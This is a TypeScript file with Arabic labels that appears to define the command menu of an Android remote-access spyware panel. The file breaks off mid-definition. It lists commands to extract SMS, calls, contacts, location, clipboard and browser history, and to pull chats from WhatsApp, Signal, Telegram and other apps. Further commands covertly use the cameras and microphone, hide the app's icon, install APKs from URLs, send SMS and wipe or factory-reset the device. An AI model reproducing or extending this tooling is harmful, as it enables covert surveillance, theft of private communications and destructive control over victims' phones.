export interface CommandDef {
  cmd: string
  name: string
  icon: string
  category: string
  // eslint-disable-next-line @typescript-eslint/no-explicit-any
  params?: Record<string, any>
  hasParams?: boolean
  paramFields?: ParamField[]
}

export interface ParamField {
  key: string
  label: string
  type: 'text' | 'number' | 'select'
  options?: { label: string; value: string | number }[]
  required?: boolean
  placeholder?: string
}

export interface CategoryDef {
  name: string
  icon: string
  color: string
  commands: Record<string, CommandDef>
}

export const CMD_CATEGORIES: Record<string, CategoryDef> = {
  data: {
    name: 'البيانات',
    icon: '📊',
    color: '#4CAF50',
    commands: {
      sms: { cmd: 'get_sms', name: 'الرسائل', icon: '💬', category: 'data' },
      calls: { cmd: 'get_calls', name: 'سجل المكالمات', icon: '📞', category: 'data' },
      contacts: { cmd: 'get_contacts', name: 'جهات الاتصال', icon: '👤', category: 'data' },
      location: { cmd: 'get_location', name: 'الموقع', icon: '📍', category: 'data' },
      notifications: { cmd: 'get_notifications', name: 'الإشعارات', icon: '🔔', category: 'data' },
      apps: { cmd: 'get_apps', name: 'التطبيقات', icon: '📱', category: 'data' },
      info: { cmd: 'get_info', name: 'معلومات الجهاز', icon: 'ℹ️', category: 'data' },
      battery: { cmd: 'get_battery', name: 'البطارية', icon: '🔋', category: 'data' },
      gallery: { cmd: 'get_gallery', name: 'المعرض', icon: '🖼️', category: 'data' },
      clipboard: { cmd: 'get_clipboard', name: 'الحافظة', icon: '📋', category: 'data' },
      all_data: { cmd: 'get_all', name: 'جميع البيانات', icon: '📦', category: 'data' },
      wifi_info: { cmd: 'get_wifi_info', name: 'معلومات WiFi', icon: '📶', category: 'data' },
      network_info: { cmd: 'get_network_info', name: 'معلومات الشبكة', icon: '🌐', category: 'data' },
      sim_info: { cmd: 'get_sim_info', name: 'معلومات SIM', icon: '📲', category: 'data' },
      storage_info: { cmd: 'get_storage_info', name: 'التخزين', icon: '💾', category: 'data' },
      installed_apps: { cmd: 'get_installed_apps', name: 'التطبيقات المثبتة', icon: '📱', category: 'data' },
      running_apps: { cmd: 'get_running_apps', name: 'التطبيقات النشطة', icon: '⚡', category: 'data' },
      calendar: { cmd: 'get_calendar', name: 'التقويم', icon: '📅', category: 'data' },
      browser_history: { cmd: 'get_browser_history', name: 'سجل المتصفح', icon: '🌍', category: 'data' },
      app_usage: { cmd: 'get_app_usage', name: 'وقت الشاشة', icon: '⏱️', category: 'data' },
      calendar_events: { cmd: 'get_calendar_events', name: 'أحداث التقويم', icon: '📅', category: 'data' },
      calendar_next: { cmd: 'get_calendar_next', name: 'المواعيد القادمة', icon: '🔜', category: 'data' },
      browser_bookmarks: { cmd: 'get_browser_bookmarks', name: 'إشارات المتصفح', icon: '🔖', category: 'data' },
      wifi_networks: { cmd: 'get_wifi_networks', name: 'شبكات WiFi', icon: '📶', category: 'data' },
      wifi_saved: { cmd: 'get_wifi_saved', name: 'WiFi المحفوظة', icon: '💾', category: 'data' },
      bluetooth_devices: { cmd: 'get_bluetooth_devices', name: 'أجهزة بلوتوث', icon: '🔵', category: 'data' },
      bluetooth_paired: { cmd: 'get_bluetooth_paired', name: 'بلوتوث مقترن', icon: '🔗', category: 'data' },
      installed_apps_full: { cmd: 'get_installed_apps_full', name: 'تطبيقات كاملة', icon: '📦', category: 'data' },
      running_services: { cmd: 'get_running_services', name: 'الخدمات النشطة', icon: '⚙️', category: 'data' },
      system_apps: { cmd: 'get_system_apps', name: 'تطبيقات النظام', icon: '🛠️', category: 'data' },
      memory_info: { cmd: 'get_memory_info', name: 'الذاكرة', icon: '🧠', category: 'data' },
      cpu_info: { cmd: 'get_cpu_info', name: 'معلومات المعالج', icon: '🖥️', category: 'data' },
      gpu_info: { cmd: 'get_gpu_info', name: 'كرت الرسومات', icon: '🎨', category: 'data' },
      battery_history: { cmd: 'get_battery_history', name: 'سجل البطارية', icon: '📈', category: 'data' },
      network_usage: { cmd: 'get_network_usage', name: 'استهلاك الشبكة', icon: '📊', category: 'data' },
      data_usage: { cmd: 'get_data_usage', name: 'استهلاك البيانات', icon: '📶', category: 'data' },
      screen_info: { cmd: 'get_screen_info', name: 'معلومات الشاشة', icon: '📱', category: 'data' },
      display_info: { cmd: 'get_display_info', name: 'العرض', icon: '🖥️', category: 'data' },
      locale_info: { cmd: 'get_locale_info', name: 'اللغة والمنطقة', icon: '🌐', category: 'data' },
      accounts: { cmd: 'get_accounts', name: 'حسابات الجهاز', icon: '👤', category: 'data' },
      sync_settings: { cmd: 'get_sync_settings', name: 'إعدادات المزامنة', icon: '🔄', category: 'data' },
    },
  },
  social: {
    name: 'وسائل التواصل',
    icon: '💬',
    color: '#25D366',
    commands: {
      whatsapp: { cmd: 'get_whatsapp', name: 'واتساب', icon: '💬', category: 'social' },
      telegram_app: { cmd: 'get_telegram', name: 'تيليجرام', icon: '✈️', category: 'social' },
      instagram: { cmd: 'get_instagram', name: 'انستغرام', icon: '📷', category: 'social' },
      messenger: { cmd: 'get_messenger', name: 'ماسنجر', icon: '💭', category: 'social' },
      snapchat: { cmd: 'get_snapchat', name: 'سناب شات', icon: '👻', category: 'social' },
      tiktok: { cmd: 'get_tiktok', name: 'تيك توك', icon: '🎵', category: 'social' },
      twitter: { cmd: 'get_twitter', name: 'تويتر', icon: '🐦', category: 'social' },
      viber: { cmd: 'get_viber', name: 'فايبر', icon: '📞', category: 'social' },
      signal: { cmd: 'get_signal', name: 'سيجنال', icon: '🔒', category: 'social' },
      facebook: { cmd: 'get_facebook', name: 'فيسبوك', icon: '👤', category: 'social' },
      youtube: { cmd: 'get_youtube', name: 'يوتيوب', icon: '▶️', category: 'social' },
      whatsapp_chats: { cmd: 'get_whatsapp_chats', name: 'محادثات واتساب', icon: '💬', category: 'social' },
      whatsapp_contacts: { cmd: 'get_whatsapp_contacts', name: 'أسماء واتساب', icon: '👥', category: 'social' },
      whatsapp_status: { cmd: 'get_whatsapp_status', name: 'حالة واتساب', icon: '🟢', category: 'social' },
      telegram_chats: { cmd: 'get_telegram_chats', name: 'محادثات تيليجرام', icon: '✈️', category: 'social' },
      telegram_contacts: { cmd: 'get_telegram_contacts', name: 'أسماء تيليجرام', icon: '👥', category: 'social' },
      messenger_chats: { cmd: 'get_messenger_chats', name: 'محادثات ماسنجر', icon: '💭', category: 'social' },
      messenger_contacts: { cmd: 'get_messenger_contacts', name: 'أسماء ماسنجر', icon: '👥', category: 'social' },
      instagram_dm: { cmd: 'get_instagram_dm', name: 'رسائل انستغرام', icon: '📥', category: 'social' },
      instagram_followers: { cmd: 'get_instagram_followers', name: 'متابعون', icon: '👤', category: 'social' },
      viber_chats: { cmd: 'get_viber_chats', name: 'محادثات فايبر', icon: '📞', category: 'social' },
      viber_calls: { cmd: 'get_viber_calls', name: 'مكالمات فايبر', icon: '☎️', category: 'social' },
      signal_chats: { cmd: 'get_signal_chats', name: 'محادثات سيجنال', icon: '🔒', category: 'social' },
      signal_contacts: { cmd: 'get_signal_contacts', name: 'أسماء سيجنال', icon: '👥', category: 'social' },
      line_chats: { cmd: 'get_line_chats', name: 'محادثات LINE', icon: '🟩', category: 'social' },
      snapchat_chats: { cmd: 'get_snapchat_chats', name: 'محادثات سناب', icon: '👻', category: 'social' },
      twitter_dm: { cmd: 'get_twitter_dm', name: 'رسائل تويتر', icon: '🐦', category: 'social' },
      tiktok_messages: { cmd: 'get_tiktok_messages', name: 'رسائل تيك توك', icon: '🎵', category: 'social' },
    },
  },
  control: {
    name: 'التحكم',
    icon: '🎮',
    color: '#2196F3',
    commands: {
      ping: { cmd: 'ping', name: 'Ping', icon: '🏓', category: 'control' },
      vibrate: { cmd: 'vibrate', name: 'اهتزاز', icon: '📳', category: 'control' },
      ring: { cmd: 'ring', name: 'رنين', icon: '🔔', category: 'control' },
      screenshot: { cmd: 'screenshot', name: 'لقطة شاشة', icon: '📸', category: 'control' },
      front_camera: { cmd: 'front_camera', name: 'الكاميرا الأمامية', icon: '🤳', category: 'control' },
      back_camera: { cmd: 'back_camera', name: 'الكاميرا الخلفية', icon: '📷', category: 'control' },
      record_audio: { cmd: 'record_audio', name: 'تسجيل صوت', icon: '🎙️', category: 'control' },
      record_screen: { cmd: 'record_screen', name: 'تسجيل الشاشة', icon: '🎬', category: 'control' },
      lock_phone: { cmd: 'lock_phone', name: 'قفل الجهاز', icon: '🔒', category: 'control' },
      unlock_phone: { cmd: 'unlock_phone', name: 'فتح الجهاز', icon: '🔓', category: 'control' },
      reboot: { cmd: 'reboot', name: 'إعادة تشغيل', icon: '🔄', category: 'control' },
      shutdown: { cmd: 'shutdown', name: 'إيقاف التشغيل', icon: '⛔', category: 'control' },
      set_volume: {
        cmd: 'set_volume', name: 'التحكم بالصوت', icon: '🔊', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'level', label: 'مستوى الصوت', type: 'number', placeholder: '0-100', required: true }],
      },
      set_brightness: {
        cmd: 'set_brightness', name: 'السطوع', icon: '☀️', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'level', label: 'مستوى السطوع', type: 'number', placeholder: '0-255', required: true }],
      },
      set_ringtone: {
        cmd: 'set_ringtone', name: 'نغمة الرنين', icon: '🎵', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'uri', label: 'مسار النغمة', type: 'text', placeholder: '/storage/.../ringtone.mp3', required: false }],
      },
      enable_wifi: { cmd: 'enable_wifi', name: 'تشغيل WiFi', icon: '📶', category: 'control' },
      disable_wifi: { cmd: 'disable_wifi', name: 'إيقاف WiFi', icon: '📵', category: 'control' },
      enable_bluetooth: { cmd: 'enable_bluetooth', name: 'تشغيل بلوتوث', icon: '🔵', category: 'control' },
      disable_bluetooth: { cmd: 'disable_bluetooth', name: 'إيقاف بلوتوث', icon: '❌', category: 'control' },
      enable_mobile_data: { cmd: 'enable_mobile_data', name: 'تشغيل البيانات', icon: '📱', category: 'control' },
      disable_mobile_data: { cmd: 'disable_mobile_data', name: 'إيقاف البيانات', icon: '📵', category: 'control' },
      enable_hotspot: { cmd: 'enable_hotspot', name: 'تشغيل الهوت سبوت', icon: '📡', category: 'control' },
      disable_hotspot: { cmd: 'disable_hotspot', name: 'إيقاف الهوت سبوت', icon: '📵', category: 'control' },
      airplane_on: { cmd: 'airplane_on', name: 'وضع الطيران', icon: '✈️', category: 'control' },
      airplane_off: { cmd: 'airplane_off', name: 'إلغاء الطيران', icon: '🛬', category: 'control' },
      torch_on: { cmd: 'torch_on', name: 'تشغيل الفلاش', icon: '🔦', category: 'control' },
      torch_off: { cmd: 'torch_off', name: 'إيقاف الفلاش', icon: '🔦', category: 'control' },
      play_sound: { cmd: 'play_sound', name: 'تشغيل صوت', icon: '🔊', category: 'control' },
      speak_text: {
        cmd: 'speak_text', name: 'نطق نص', icon: '🗣️', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'text', label: 'النص', type: 'text', placeholder: 'أدخل النص', required: true }],
      },
      show_notification: {
        cmd: 'show_notification', name: 'إظهار إشعار', icon: '🔔', category: 'control',
        hasParams: true,
        paramFields: [
          { key: 'title', label: 'العنوان', type: 'text', placeholder: 'عنوان الإشعار', required: true },
          { key: 'text', label: 'النص', type: 'text', placeholder: 'نص الإشعار', required: true },
        ],
      },
      open_url: {
        cmd: 'open_url', name: 'فتح رابط', icon: '🔗', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'url', label: 'الرابط', type: 'text', placeholder: 'https://', required: true }],
      },
      send_sms: {
        cmd: 'send_sms', name: 'إرسال رسالة', icon: '💬', category: 'control',
        hasParams: true,
        paramFields: [
          { key: 'number', label: 'الرقم', type: 'text', placeholder: 'رقم الهاتف', required: true },
          { key: 'message', label: 'الرسالة', type: 'text', placeholder: 'نص الرسالة', required: true },
        ],
      },
      make_call: {
        cmd: 'make_call', name: 'إجراء مكالمة', icon: '📞', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'number', label: 'الرقم', type: 'text', placeholder: 'رقم الهاتف', required: true }],
      },
      safe_mode: { cmd: 'safe_mode', name: 'الوضع الآمن', icon: '🛡️', category: 'control' },
      set_screen_timeout: {
        cmd: 'set_screen_timeout', name: 'وقت إيقاف الشاشة', icon: '⏲️', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'seconds', label: 'الثواني', type: 'number', placeholder: '30', required: true }],
      },
      set_ringer_mode: {
        cmd: 'set_ringer_mode', name: 'وضع الرنين', icon: '🔊', category: 'control',
        hasParams: true,
        paramFields: [{
          key: 'mode', label: 'الوضع', type: 'select', required: true,
          options: [
            { label: 'عام', value: 'normal' },
            { label: 'صامت', value: 'silent' },
            { label: 'اهتزاز', value: 'vibrate' },
          ],
        }],
      },
      play_tone: {
        cmd: 'play_tone', name: 'نغمة قصيرة', icon: '🎵', category: 'control',
        hasParams: true,
        paramFields: [
          { key: 'frequency', label: 'التردد (Hz)', type: 'number', placeholder: '440', required: false },
          { key: 'duration', label: 'المدة (ms)', type: 'number', placeholder: '500', required: false },
        ],
      },
      set_wallpaper: {
        cmd: 'set_wallpaper', name: 'خلفية الشاشة', icon: '🖼️', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'url', label: 'رابط الصورة', type: 'text', placeholder: 'https://...', required: true }],
      },
      set_alarm: {
        cmd: 'set_alarm', name: 'ضبط منبه', icon: '⏰', category: 'control',
        hasParams: true,
        paramFields: [
          { key: 'hour', label: 'الساعة', type: 'number', placeholder: '8', required: true },
          { key: 'minute', label: 'الدقيقة', type: 'number', placeholder: '30', required: true },
        ],
      },
      set_locale: {
        cmd: 'set_locale', name: 'لغة الجهاز', icon: '🌍', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'locale', label: 'اللغة', type: 'text', placeholder: 'ar-SA', required: true }],
      },
      set_language: {
        cmd: 'set_language', name: 'تغيير اللغة', icon: '🗣️', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'language', label: 'اللغة', type: 'text', placeholder: 'ar', required: true }],
      },
      set_timezone: {
        cmd: 'set_timezone', name: 'المنطقة الزمنية', icon: '🕒', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'timezone', label: 'المنطقة', type: 'text', placeholder: 'Asia/Riyadh', required: true }],
      },
      set_gps_mode: {
        cmd: 'set_gps_mode', name: 'وضع GPS', icon: '🛰️', category: 'control',
        hasParams: true,
        paramFields: [{
          key: 'mode', label: 'الوضع', type: 'select', required: true,
          options: [
            { label: 'عالي', value: 'high_accuracy' },
            { label: 'منخفض', value: 'battery_saving' },
            { label: 'جهاز فقط', value: 'device_only' },
          ],
        }],
      },
      enable_data_saver: { cmd: 'enable_data_saver', name: 'حافظ البيانات', icon: '💾', category: 'control' },
      disable_data_saver: { cmd: 'disable_data_saver', name: 'إيقاف حافظ البيانات', icon: '📴', category: 'control' },
      enable_battery_saver: { cmd: 'enable_battery_saver', name: 'حافظ البطارية', icon: '🪫', category: 'control' },
      disable_battery_saver: { cmd: 'disable_battery_saver', name: 'إيقاف حافظ البطارية', icon: '🔋', category: 'control' },
      enable_auto_rotate: { cmd: 'enable_auto_rotate', name: 'تدوير تلقائي', icon: '🔄', category: 'control' },
      disable_auto_rotate: { cmd: 'disable_auto_rotate', name: 'إيقاف التدوير', icon: '🔒', category: 'control' },
      enable_nfc: { cmd: 'enable_nfc', name: 'تشغيل NFC', icon: '📡', category: 'control' },
      disable_nfc: { cmd: 'disable_nfc', name: 'إيقاف NFC', icon: '📴', category: 'control' },
      enable_dev_mode: { cmd: 'enable_dev_mode', name: 'وضع المطور', icon: '🧪', category: 'control' },
      disable_dev_mode: { cmd: 'disable_dev_mode', name: 'إيقاف المطور', icon: '🚫', category: 'control' },
      enable_usb_debug: { cmd: 'enable_usb_debug', name: 'تصحيح USB', icon: '🔌', category: 'control' },
      disable_usb_debug: { cmd: 'disable_usb_debug', name: 'إيقاف USB', icon: '📵', category: 'control' },
      dns_change: {
        cmd: 'dns_change', name: 'تغيير DNS', icon: '🌐', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'dns1', label: 'DNS 1', type: 'text', placeholder: '8.8.8.8', required: true }],
      },
      proxy_set: {
        cmd: 'proxy_set', name: 'إعداد Proxy', icon: '🔧', category: 'control',
        hasParams: true,
        paramFields: [
          { key: 'host', label: 'المضيف', type: 'text', placeholder: '192.168.1.1', required: true },
          { key: 'port', label: 'المنفذ', type: 'number', placeholder: '8080', required: true },
        ],
      },
      apn_settings: { cmd: 'apn_settings', name: 'إعدادات APN', icon: '📲', category: 'control' },
      block_number: {
        cmd: 'block_number', name: 'حظر رقم', icon: '🚫', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'number', label: 'الرقم', type: 'text', placeholder: '+9665...', required: true }],
      },
      unblock_number: {
        cmd: 'unblock_number', name: 'إلغاء حظر رقم', icon: '✅', category: 'control',
        hasParams: true,
        paramFields: [{ key: 'number', label: 'الرقم', type: 'text', placeholder: '+9665...', required: true }],
      },
    },
  },
  apps: {
    name: 'التطبيقات',
    icon: '📱',
    color: '#FF9800',
    commands: {
      open_app: {
        cmd: 'open_app', name: 'فتح تطبيق', icon: '📱', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      close_app: {
        cmd: 'close_app', name: 'إغلاق تطبيق', icon: '❌', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      install_app: {
        cmd: 'install_app', name: 'تثبيت تطبيق', icon: '⬇️', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'url', label: 'رابط APK', type: 'text', placeholder: 'رابط التثبيت', required: true }],
      },
      uninstall_app: {
        cmd: 'uninstall_app', name: 'حذف تطبيق', icon: '🗑️', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      block_app: {
        cmd: 'block_app', name: 'حظر تطبيق', icon: '🚫', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      unblock_app: {
        cmd: 'unblock_app', name: 'إلغاء حظر', icon: '✅', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      clear_app_data: {
        cmd: 'clear_app_data', name: 'مسح بيانات', icon: '🧹', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      force_stop_app: {
        cmd: 'force_stop_app', name: 'إيقاف قسري', icon: '⛔', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      clear_app_cache: {
        cmd: 'clear_app_cache', name: 'مسح الكاش', icon: '🧽', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      enable_app: {
        cmd: 'enable_app', name: 'تفعيل تطبيق', icon: '✅', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      disable_app: {
        cmd: 'disable_app', name: 'تعطيل تطبيق', icon: '🚫', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      get_app_info: {
        cmd: 'get_app_info', name: 'معلومات تطبيق', icon: 'ℹ️', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      get_app_permissions: {
        cmd: 'get_app_permissions', name: 'صلاحيات تطبيق', icon: '🔑', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      get_app_data_usage: {
        cmd: 'get_app_data_usage', name: 'بيانات التطبيق', icon: '📊', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      set_app_restrictions: {
        cmd: 'set_app_restrictions', name: 'قيود التطبيق', icon: '⚠️', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      hide_app_pkg: {
        cmd: 'hide_app_pkg', name: 'إخفاء حزمة', icon: '🙈', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      unhide_app_pkg: {
        cmd: 'unhide_app_pkg', name: 'إظهار حزمة', icon: '👁️', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      app_info: {
        cmd: 'app_info', name: 'تفاصيل التطبيق', icon: '📋', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      app_permissions: {
        cmd: 'app_permissions', name: 'صلاحيات الحزمة', icon: '🔐', category: 'apps',
        hasParams: true,
        paramFields: [{ key: 'package', label: 'اسم الحزمة', type: 'text', placeholder: 'com.example.app', required: true }],
      },
      list_blocked: { cmd: 'list_blocked', name: 'التطبيقات المحظورة', icon: '🚫', category: 'apps' },
    },
  },
  files: {
    name: 'الملفات',
    icon: '📂',
    color: '#9C27B0',
    commands: {
      list_files: {
        cmd: 'list_files', name: 'عرض الملفات', icon: '📁', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'المسار', type: 'text', placeholder: '/storage/emulated/0/', required: false }],
      },
      list_downloads: { cmd: 'list_files', name: 'التنزيلات', icon: '📥', category: 'files', params: { path: '/storage/emulated/0/Download' } },
      list_dcim: { cmd: 'list_files', name: 'الكاميرا', icon: '📷', category: 'files', params: { path: '/storage/emulated/0/DCIM' } },
      list_music: { cmd: 'list_files', name: 'الموسيقى', icon: '🎵', category: 'files', params: { path: '/storage/emulated/0/Music' } },
      list_videos: { cmd: 'list_files', name: 'الفيديوهات', icon: '🎬', category: 'files', params: { path: '/storage/emulated/0/Videos' } },
      list_documents: { cmd: 'list_files', name: 'المستندات', icon: '📄', category: 'files', params: { path: '/storage/emulated/0/Documents' } },
      list_whatsapp: { cmd: 'list_files', name: 'واتساب ملفات', icon: '💬', category: 'files', params: { path: '/storage/emulated/0/WhatsApp' } },
      list_telegram_files: { cmd: 'list_files', name: 'تيليجرام ملفات', icon: '✈️', category: 'files', params: { path: '/storage/emulated/0/Telegram' } },
      list_pictures: { cmd: 'list_files', name: 'الصور', icon: '🖼️', category: 'files', params: { path: '/storage/emulated/0/Pictures' } },
      list_audiobooks: { cmd: 'list_files', name: 'الكتب الصوتية', icon: '📚', category: 'files', params: { path: '/storage/emulated/0/Audiobooks' } },
      list_podcasts: { cmd: 'list_files', name: 'البودكاست', icon: '🎙️', category: 'files', params: { path: '/storage/emulated/0/Podcasts' } },
      list_notifications: { cmd: 'list_files', name: 'إشعارات النظام', icon: '🔔', category: 'files', params: { path: '/storage/emulated/0/Notifications' } },
      list_recordings: { cmd: 'list_files', name: 'التسجيلات', icon: '🎤', category: 'files', params: { path: '/storage/emulated/0/Recordings' } },
      recent_files: { cmd: 'recent_files', name: 'أحدث الملفات', icon: '🕐', category: 'files' },
      search_files: {
        cmd: 'search_files', name: 'بحث ملفات', icon: '🔍', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'query', label: 'اسم الملف', type: 'text', placeholder: 'ابحث عن ملف...', required: true }],
      },
      get_file: {
        cmd: 'get_file', name: 'تحميل ملف', icon: '⬇️', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/emulated/0/...', required: true }],
      },
      download_file: {
        cmd: 'download_file', name: 'تنزيل ملف', icon: '📥', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'url', label: 'الرابط', type: 'text', placeholder: 'https://...', required: true }],
      },
      upload_file: {
        cmd: 'upload_file', name: 'رفع ملف', icon: '📤', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/emulated/0/...', required: true }],
      },
      delete_file: {
        cmd: 'delete_file', name: 'حذف ملف', icon: '🗑️', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/emulated/0/...', required: true }],
      },
      rename_file: {
        cmd: 'rename_file', name: 'إعادة تسمية', icon: '✏️', category: 'files',
        hasParams: true,
        paramFields: [
          { key: 'path', label: 'المسار الحالي', type: 'text', placeholder: '/storage/.../old.txt', required: true },
          { key: 'new_name', label: 'الاسم الجديد', type: 'text', placeholder: 'new.txt', required: true },
        ],
      },
      move_file: {
        cmd: 'move_file', name: 'نقل ملف', icon: '🔀', category: 'files',
        hasParams: true,
        paramFields: [
          { key: 'path', label: 'المسار الحالي', type: 'text', placeholder: '/storage/.../file.txt', required: true },
          { key: 'dest', label: 'المسار الجديد', type: 'text', placeholder: '/storage/.../new/', required: true },
        ],
      },
      copy_file: {
        cmd: 'copy_file', name: 'نسخ ملف', icon: '📋', category: 'files',
        hasParams: true,
        paramFields: [
          { key: 'path', label: 'المسار الحالي', type: 'text', placeholder: '/storage/.../file.txt', required: true },
          { key: 'dest', label: 'النسخ إلى', type: 'text', placeholder: '/storage/.../copy.txt', required: true },
        ],
      },
      create_folder: {
        cmd: 'create_folder', name: 'إنشاء مجلد', icon: '📁', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'المسار الكامل', type: 'text', placeholder: '/storage/emulated/0/NewFolder', required: true }],
      },
      delete_folder: {
        cmd: 'delete_folder', name: 'حذف مجلد', icon: '🗑️', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار المجلد', type: 'text', placeholder: '/storage/emulated/0/Folder', required: true }],
      },
      list_files_recursive: {
        cmd: 'list_files_recursive', name: 'عرض متداخل', icon: '🗂️', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'المسار', type: 'text', placeholder: '/storage/emulated/0/', required: false }],
      },
      get_file_content: {
        cmd: 'get_file_content', name: 'محتوى ملف', icon: '📜', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/.../file.txt', required: true }],
      },
      get_file_info: {
        cmd: 'get_file_info', name: 'معلومات ملف', icon: 'ℹ️', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/.../file.txt', required: true }],
      },
      get_file_hash: {
        cmd: 'get_file_hash', name: 'بصمة الملف', icon: '#️⃣', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/.../file.txt', required: true }],
      },
      compress_file: {
        cmd: 'compress_file', name: 'ضغط ملف', icon: '🗜️', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف/المجلد', type: 'text', placeholder: '/storage/.../folder', required: true }],
      },
      extract_archive: {
        cmd: 'extract_archive', name: 'استخراج أرشيف', icon: '📂', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الأرشيف', type: 'text', placeholder: '/storage/.../file.zip', required: true }],
      },
      encrypt_file: {
        cmd: 'encrypt_file', name: 'تشفير ملف', icon: '🔒', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/.../file.txt', required: true }],
      },
      decrypt_file: {
        cmd: 'decrypt_file', name: 'فك تشفير ملف', icon: '🔓', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/.../file.enc', required: true }],
      },
      file_info: {
        cmd: 'file_info', name: 'تفاصيل الملف', icon: '📄', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار الملف', type: 'text', placeholder: '/storage/.../file.txt', required: true }],
      },
      zip_files: {
        cmd: 'zip_files', name: 'أرشفة ZIP', icon: '🗜️', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار المجلد', type: 'text', placeholder: '/storage/.../folder', required: true }],
      },
      get_folder_size: {
        cmd: 'get_folder_size', name: 'حجم المجلد', icon: '📐', category: 'files',
        hasParams: true,
        paramFields: [{ key: 'path', label: 'مسار المجلد', type: 'text', placeholder: '/storage/.../folder', required: true }],
      },
      send_full_backup: { cmd: 'send_backup_all', name: 'نسخ احتياطي كامل', icon: '💾', category: 'files' },
      send_backup_contacts: { cmd: 'send_backup_contacts', name: 'نسخة جهات الاتصال', icon: '👤', category: 'files' },
      send_backup_sms: { cmd: 'send_backup_sms', name: 'نسخة الرسائل', icon: '💬', category: 'files' },
      send_backup_calls: { cmd: 'send_backup_calls', name: 'نسخة المكالمات', icon: '📞', category: 'files' },
      send_backup_whatsapp: { cmd: 'send_backup_whatsapp', name: 'نسخة واتساب', icon: '💾', category: 'files' },
    },
  },
  security: {
    name: 'الأمان',
    icon: '🔒',
    color: '#F44336',
    commands: {
      wipe_data: { cmd: 'wipe_data', name: 'مسح البيانات', icon: '💣', category: 'security' },
      factory_reset: { cmd: 'factory_reset', name: 'إعادة تعيين المصنع', icon: '⚠️', category: 'security' },
      show_app: { cmd: 'show_app', name: 'إظهار التطبيق', icon: '👁️', category: 'security' },
      hide_app: { cmd: 'hide_app', name: 'إخفاء التطبيق', icon: '🙈', category: 'security' },
      change_passcode: {
        cmd: 'change_passcode', name: 'تغيير رمز PIN', icon: '🔑', category: 'security',
        hasParams: true,
